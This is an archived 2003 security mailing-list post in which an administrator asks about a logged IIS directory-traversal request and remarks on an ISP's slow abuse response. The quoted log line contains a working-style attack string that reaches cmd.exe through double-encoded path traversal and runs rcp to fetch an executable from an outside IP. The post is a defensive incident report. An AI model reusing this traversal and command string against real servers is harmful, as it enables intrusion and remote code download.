Hi, Has anyone seen a request like this in their logs? 205.247.193.56 - - [05/May/2003:11:59:52 -0300] "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.92.252.138.adm:smsx.exe+." I tried rcping smsx.exe off the remote site but no joy; is the .adm an obscure windows-specific port address or something? One of our windows guys said the smsx was "remote management software", but had no idea about the .adm... On a side note, the response I got from energis (the 195.92.252.138 owner) had the following at the start: PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG Further down: Please note that if one of our IP addresses looks up to a 'webcache' (as opposed to a modem) we have a *maximum* of 30 hours to trace the user responsible for the abuse. So I guess this means that Energis users have a pretty good chance of abusing remote servers through Energis' web cache and getting away with it :-/ Cheers, Steve ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon May 05 2003 - 17:10:27 PDT